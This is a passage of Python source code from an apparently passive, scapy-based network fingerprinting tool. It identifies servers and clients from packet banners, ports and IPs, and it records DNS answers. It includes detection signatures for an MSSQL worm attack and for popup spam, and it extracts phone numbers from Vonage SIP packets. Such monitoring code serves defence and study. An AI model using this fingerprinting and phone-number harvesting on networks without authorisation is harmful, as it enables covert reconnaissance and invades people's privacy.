\"http/nucleus\"\n\t\t\t\t\t\t\telif (Payload.find('Server: RomPager') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/rompager\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/rompager\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Server') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/server\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/server\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Sun-ONE-Web-Server/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/sun-one\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/sun-one\"\n\t\t\t\t\t\t\telif (Payload.find('Server: TrustRank Frontend') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/trustrank\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/trustrank\"\n\t\t\t\t\t\t\telif (Payload.find('Server: YTS/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/yahoo\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/yahoo\"\n\t\t\t\t\t\t\telif (Payload.find('HTTP/1.0 404 Not Found') > -1) or (Payload.find('HTTP/1.1 200 OK') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/generic\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/generic\"\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"110\") and (Payload != None) and (Payload.find('POP3 Server Ready') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"pop3/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"pop3/generic\"\n\t\t\t\t\t\telif (sport == \"143\") and (Payload != None) and (Payload.find('* OK dovecot ready') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"imap/dovecot\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"imap/dovecot\"\n\t\t\t\t\t\telif (sport == \"143\") and (Payload != None) and (Payload.find(' IMAP4rev1 ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"imap/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"imap/generic\"\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"783\") and (Payload != None) and (Payload.find('SPAMD/1.1 ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"spamd/spamd\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"spamd/spamd\"\n\t\t\t\t\t\telif ( (sport == \"3128\") or (sport == \"80\") ) and (Payload != None) and (Payload.find('Via: ') > -1) and (Payload.find(' (squid/') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"proxy/squid\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"proxy/squid\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\telif ((LiveTCPService.has_key(ToPort)) and (LiveTCPService[ToPort] == True)):\t\t#If the \"To\" side is a known TCP server:\n\t\t\t\t\tClientKey = sIP + \",TCP_\" + dport\t#Note: 
CLIENT ip and SERVER port\n\t\t\t\t\tif (not ClientDescription.has_key(ClientKey)):\n\t\t\t\t\t\tif (dport == \"22\") and (Payload != None) and ( (Payload.find('SSH-2.0-OpenSSH_') > -1) or (Payload.find('SSH-1.5-OpenSSH_') > -1) ):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"ssh/openssh\")\n\t\t\t\t\t\t#As cute as it is to catch this, it miscatches any relay that's carrying a pine-generated mail.\n\t\t\t\t\t\t#elif (dport == \"25\") and (Payload != None) and (Payload.find('Message-ID: <Pine.') > -1):\n\t\t\t\t\t\t#\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"smtp/pine\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: libwww-perl/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/libwww-perl\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Lynx') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/lynx\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Mozilla') > -1) and (Payload.find(' Firefox/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/firefox\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Wget/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/wget\")\n\t\t\t\t\t\telif (dport == \"143\") and (Payload != None) and (Payload.find('A0001 CAPABILITY') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"imap/generic\")\n\t\t\t\t\t\t\t#LogNewPayload(ClientPayloadDir, ClientKey, Payload)\n\t\t\t\t\t\telif (dport == \"783\") and (Payload != None) and (Payload.find('PROCESS SPAMC') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"spamd/spamc\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ClientPayloadDir, ClientKey, Payload)\n\t\t\t\telse:\t#Neither port pair is known as a server\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t#Following is debugging at best; it should only show up early on as the sniffer listens to conversations for which it didn't hear the SYN/ACK\n\t\t\t\t\t#print \"note: neither \" + FromPort + \" nor \" + ToPort + \" is listed as a live service.\"\n\t\t\telse:\t#Other TCP flag combinations here\n\t\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 17 and (type(p['UDP']) == UDP):\t\t#UDP. We have to check the object type as well as we do get (corrupted? truncated?) 
packets with type 17 that aren't udp: AttributeError: 'NoneType' object has no attribute 'sport'\n\t\t\t#FIXME - possibly run udp packets through ServiceFPs as well?\n\t\t\tsport=str(p['UDP'].sport)\n\t\t\tdport=str(p['UDP'].dport)\n\t\t\tSrcService = sIP + \",UDP_\" + sport\n\t\t\tDstService = dIP + \",UDP_\" + dport\n\t\t\tSrcClient = sIP + \",UDP_\" + dport\n\t\t\tPayload = p['Raw.load']\n\n\t\t\t#Multicast DNS: http://files.multicastdns.org/draft-cheshire-dnsext-multicastdns.txt\n\t\t\t#- usually sent to 224.0.0.251 (or FF02::FB) (link-local multicast).\n\t\t\t#\t- if \".local.\" in query, these MUST be the target IPs\n\t\t\t#\t- non-local queries may be sent to these or normal dns servers\n\t\t\t#\t- rdns queries for \"254.169.in-addr.arpa.\" MUST be sent to 224.0.0.251\n\t\t\t#\t- rdns queries for \"8.e.f.ip6.arpa.\", \"9.e.f.ip6.arpa.\",\"a.e.f.ip6.arpa.\", and \"b.e.f.ip6.arpa.\" MUST be sent to the IPv6 mDNS link-local multicast address FF02::FB.\n\t\t\t#- sent to udp port 5353\n\t\t\t#- generic clients may use \"single-dns-object.local.\", such as \"sparrow.local.\"\n\t\t\t#- responses have IP TTL = 255 to check that packet originated on-lan\n\n\t\t\t#Multicast DNS, placed next to normal dns, out of numerical order\n\t\t\tif (dport == \"5353\") and ( (p['IP'].ttl == 1) or (p['IP'].ttl == 255) ):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcClient)) or (LiveUDPService[SrcClient] == False)):\n\t\t\t\t\tLiveUDPService[SrcClient] = True\n\t\t\t\t\tif (dIP == \"224.0.0.251\"):\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mdns/broadcastclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mdns/client\")\n\n\t\t\t\t\t#Extract dns answers like with 53; change elif to if and add 5353 to ports on next if?\n\t\t\t\t\t#At the moment, no; scapy does not appear to parse 5353 as dns.\n\t\t\t\t\t#else:\n\t\t\t\t\t#\tUnhandledPacket(p)\n\t\t\t#FIXME - add check for \"if isinstance(p['DNS'], whatevertype):\there and at all p[] accesses.\n\t\t\telif (sport == \"53\") and (isinstance(p['DNS'], DNS)) and (p['DNS'].qr == 1):\t\t#qr == 1 is a response\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t#FIXME - Also report the TLD from one of the query answers to show what it's willing to answer for?\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"dns/server\")\n\t\t\t\t#Now we extract dns answers. 
First, check that there's no dns error:\n\t\t\t\tif (p['DNS'].rcode == 0):\t\t\t#No error\n\t\t\t\t\tDNSBlocks = [ ]\n\t\t\t\t\tCNAMERecs = [ ]\t\t\t\t#We hold onto all cnames until we've processed all PTR's and A's here\n\t\t\t\t\tif (p['DNS'].ancount > 0):\t\t#If we have at least one answer from the answer block, process it\n\t\t\t\t\t\tDNSBlocks.append(p[DNS].an)\n\t\t\t\t\tif (p['DNS'].arcount > 0):\t\t#Likewise for the \"additional\" block\n\t\t\t\t\t\tDNSBlocks.append(p[DNS].ar)\n\t\t\t\t\tfor OneAn in DNSBlocks:\n\t\t\t\t\t\t#Thanks to Philippe Biondi for showing me how to extract additional records.\n\t\t\t\t\t\t#Debug(\"Start dns extract\" + str(p['DNS'].ancount))\n\t\t\t\t\t\t#OneAn = p[DNS].an\n\t\t\t\t\t\t#while OneAn is not NoPayload:\t\t#This doesn't seem to stop at the end of the list; incorrect syntax.\n\t\t\t\t\t\twhile isinstance(OneAn,DNSRR):\t\t#Somewhat equivalent:\twhile not isinstance(an, NoPayload):\n\t\t\t\t\t\t\n\t\t\t\t\t\t\t#print \"Type: \" + str(type(OneAn))\t\t#All of type scapy.DNSRR\n\t\t\t\t\t\t\tif (OneAn.rclass == 1) and (OneAn.type == 1):\t\t#\"IN\" class and \"A\" type answer\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rdata\n\t\t\t\t\t\t\t\tDNSHostname = OneAn.rrname.lower()\n\t\t\t\t\t\t\t\t#Check new hostname to see if it's in the list.\n\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",A\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",A\"])):\n\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"A\", DNSHostname, \"\")\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 2):\t\t\t#\"IN\" class and \"NS\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Perhaps later\n\t\t\t\t\t\t\t\t#Like cnames, this is object -> nameserver hostname, so these would need to be queued like cnames until we're done with A's and PTR's.\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 5):\t\t\t#\"IN\" class and \"CNAME\" answer\n\t\t\t\t\t\t\t\tCNAMERecs.append(OneAn)\t\t\t\t\t#Remember the record; we'll process these after the PTR's and A's\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 6):\t\t\t#\"IN\" class and \"SOA\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Not immediately useful, perhaps later\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 12):\t\t#\"IN\" class and \"PTR\" type answer\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#For input of '182.111.59.66.in-addr.arpa.' 
:\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rrname.replace(\".in-addr.arpa.\", \"\")\t\t# '182.111.59.66'\n\t\t\t\t\t\t\t\tDNSIPAddr = DNSIPAddr.split('.')\t\t\t\t# ['182', '111', '59', '66']\n\t\t\t\t\t\t\t\tDNSIPAddr.reverse()\t\t\t\t\t\t# ['66', '59', '111', '182']\n\t\t\t\t\t\t\t\tDNSIPAddr = string.join(DNSIPAddr, '.')\t\t\t\t# '66.59.111.182'\n\t\t\t\t\t\t\t\t#Check that we end up with a legal IPv4 address before continuing; we're getting garbage.\n\t\t\t\t\t\t\t\tif (re.search('^[1-9][0-9\\.]*[0-9]$', DNSIPAddr) == None):\n\t\t\t\t\t\t\t\t\tDebug(\"Odd PTR rrname: \" + OneAn.rrname)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tDNSHostname = OneAn.rdata.lower()\n\t\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",PTR\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",PTR\"])):\n\t\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"PTR\", DNSHostname, \"\")\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 15):\t\t#\"IN\" class and \"MX\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Possibly later\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 28):\t\t#\"IN\" class and \"AAAA\" answer\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rdata.upper()\n\t\t\t\t\t\t\t\tDNSHostname = OneAn.rrname.lower()\n\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",AAAA\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",AAAA\"])):\n\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"AAAA\", DNSHostname, \"\")\n\n\t\t\t\t\t\t\t#Move to the next DNS object in the \"an\" block\n\t\t\t\t\t\t\tOneAn = OneAn.payload\n\t\t\t\t\tfor OneCNAME in CNAMERecs:\t\t#Now that we have all A/PTR's, go back and turn cname records into pseudo-A's\n\t\t\t\t\t\tif isinstance(OneCNAME,DNSRR):\n\t\t\t\t\t\t\tAlias = OneCNAME.rrname.lower()\n\t\t\t\t\t\t\tExisting = OneCNAME.rdata.lower()\n\t\t\t\t\t\t\tif isFQDN(Alias) and isFQDN(Existing):\n\t\t\t\t\t\t\t\tif HostIPs.has_key(Existing):\n\t\t\t\t\t\t\t\t\tfor OneIP in HostIPs[Existing]:\t\t\t\t#Loop through each of the IPs for the canonical name, and\n\t\t\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(OneIP + \",CNAME\")) or (not(Alias in DNSRecord[OneIP + \",CNAME\"])):\n\t\t\t\t\t\t\t\t\t\t\tReportId(\"DN\", OneIP, \"CNAME\", Alias, \"\")\t#report them as kind-of A records for the Alias.\n\t\t\t\t\t\t\t\t#If we don't have a A/PTR record for \"Existing\", just ignore it. 
Hopefully we'll get the Existing A/PTR in the next few answers, and will re-ask for the CNAME later, at which point we'll get a full cname record.\n\t\t\t\t\t\t\t\t#else:\n\t\t\t\t\t\t\t\t#\tDebug(\"CNAME \" + Alias + \" -> \" + Existing + \" requested, but no IP's for the latter, skipping.\")\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tDebug(\"One of \" + Alias + \" and \" + Existing + \" isn't an FQDN, skipping cname processing.\")\n\t\t\t\telif (p['DNS'].rcode == 1):\t\t\t#FormErr: server responding to an improperly formatted request\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 2):\t\t\t#ServFail: domain exists, root nameservers list authoritative name servers, but authNS's won't answer queries\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 3):\t\t\t#NXDOMAIN: root nameservers don't have any listing (domain doesn't exist or is on hold)\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 5):\t\t\t#Query refused\n\t\t\t\t\tpass\n\t\t\t\telse:\t#rcode indicates an error\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"53\") and (type(p['DNS']) == DNS) and (p['DNS'].qr == 0):\t#dns query\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"dns/client\")\n\t\t\telif (sport == \"67\") and (dport == \"68\"):\t\t#Bootp/dhcp server talking to client\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"bootpordhcp/server\")\n\t\t\telif (sport == \"68\") and (dport == \"67\"):\t\t#Bootp/dhcp client talking to server\n\t\t\t\tif (sIP != \"0.0.0.0\"):\t\t\t\t#If the client is simply renewing an IP, remember it.\n\t\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"bootpordhcp/client\")\n\t\t\t\t#else:\t\t\t\t\t\t#If you want to record which macs are asking for addresses, do it here.\n\t\t\t\t#\tpass\n\t\t\telif (sport == \"123\") and (dport == \"123\") and (p['NTP'].stratum != ''):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"ntp/generic\")\n\t\t\telif (dport == \"123\") and ( (dIP == \"216.115.23.75\") or (dIP == \"216.115.23.76\") or (dIP == \"69.59.240.75\") ):\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"ntp/vonageclient\")\n\t\t\telif (sport == \"123\") and ( (sIP == \"216.115.23.75\") or (sIP == \"216.115.23.76\") or (sIP == \"69.59.240.75\") ):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"ntp/vonageserver\")\n\t\t\telif (dport == \"137\"):\t\t\t#netbios-ns\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (p['Ethernet'].dst.upper() == \"FF:FF:FF:FF:FF:FF\"):\t\t\t#broadcast\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/broadcastclient\")\n\t\t\t\t\telif 
(Payload != None) and (Payload.find('CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA') > -1):\t#wildcard\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/wildcardclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/unicastclient\")\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"500\") and (dport == \"500\") and (p['ISAKMP'].init_cookie != ''):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"isakmp/generic\")\n\t\t\telif (dport == \"512\"):\t\t\t#BIFF\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('@') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"biff/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (dport == \"1026\") or (dport == \"1027\") or (dport == \"1028\") ):\t#winpopup spam client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and ( (Payload.find('Download Registry Update from:') > -1) or (Payload.find('CRITICAL ERROR MESSAGE! - REGISTRY DAMAGED AND CORRUPTED.') > -1) or (Payload.find('Your system registry is corrupted and needs to be cleaned immediately.') > -1) or (Payload.find('CRITICAL SYSTEM ERRORS') > -1) ):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"winpopup/spamclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"1434\"):\t\t#Probable mssql attack\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Qh.dll') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mssql/clientattack\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"1900\") and (dport == \"1900\") and (dIP == \"239.255.255.250\"):\t\t#SSDP\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('NOTIFY') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"ssdp/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"3865\") and (dIP == \"255.255.255.255\"):\t\t#XPL, http://wiki.xplproject.org.uk/index.php/Main_Page\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"xpl/client\")\n\t\t\telif (sport == \"5061\") and (dport == \"5061\") and ( (dIP == \"216.115.30.28\") or (dIP == \"69.59.227.77\") or (dIP == \"69.59.232.33\") or (dIP == \"69.59.240.84\") ):\t\t#Vonage SIP client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('.vonage.net:5061 SIP/2.0') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tSipMatch = SipPhoneMatch.search(Payload)\n\t\t\t\t\t\tif (SipMatch != None) and (len(SipMatch.groups()) >= 
1):\n\t\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"sip/vonage_client, phone number: \" + SipMatch.group(1))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"sip/vonage_client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"5061\") and (dport == \"5061\") and ( (sIP == \"216.115.30.28\") or (sIP == \"69.59.227.77\") or (sIP == \"69.59.232.33\") or (sIP == \"69.59.240.84\") ):\t#Vonage SIP server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('.vonage.net:5061>') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"sip/vonage_server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"6515\") and (dport == \"6514\") and (dIP == \"255.255.255.255\"):\t\t#mcafee ASaP broadcast, looking for a proxy out. http://www.myasap.de/intl/EN/content/virusscan_asap/faq_new.asp\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('<rumor version=') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"asap/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (sport == \"9052\") or (sport == \"9053\") or (sport == \"9054\") ) and ( (sIP == \"205.188.146.72\") or (sIP == \"205.188.157.241\") or (sIP == \"205.188.157.242\") or (sIP == \"205.188.157.243\") or (sIP == \"205.188.157.244\") or (sIP == \"64.12.51.145\") or (sIP == \"64.12.51.148\") or (sIP == \"149.174.54.131\") ):\t#Possibly AOL dns response\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('dns-01') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"aoldns/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27005\") and ( (dport == \"27016\") or (dport == \"27017\") ):\t\t\t\t#Halflife client live game\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (dport == \"27013\") and (dIP == \"207.173.177.12\"):\t\t\t\t#variable payload, so can't (Payload != None) and (Payload.find('Steam.exe') > -1)\t\t\t\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (sport == \"27013\") and (sIP == \"207.173.177.12\"):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (sport == \"27016\") or (sport == \"27017\") ) and (dport == \"27005\"):\t\t\t\t#halflife server live game\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (dport == \"27015\") or (dport == 
\"27016\") or (dport == \"27025\") or (dport == \"27026\") ):\t\t#Variable payload, so can't: (Payload != None) and (Payload.find('basic') > -1)\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (dport == \"27017\") and ( (dIP == \"69.28.148.250\") or (dIP == \"69.28.156.250\") or (dIP == \"72.165.61.161\") or (dIP == \"72.165.61.185\") or (dIP == \"72.165.61.186\") or (dIP == \"72.165.61.188\") or (dIP == \"68.142.64.164\") or (dIP == \"68.142.64.165\") or (dIP == \"68.142.64.166\") ):\t#Steamfriends client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('VS01') > 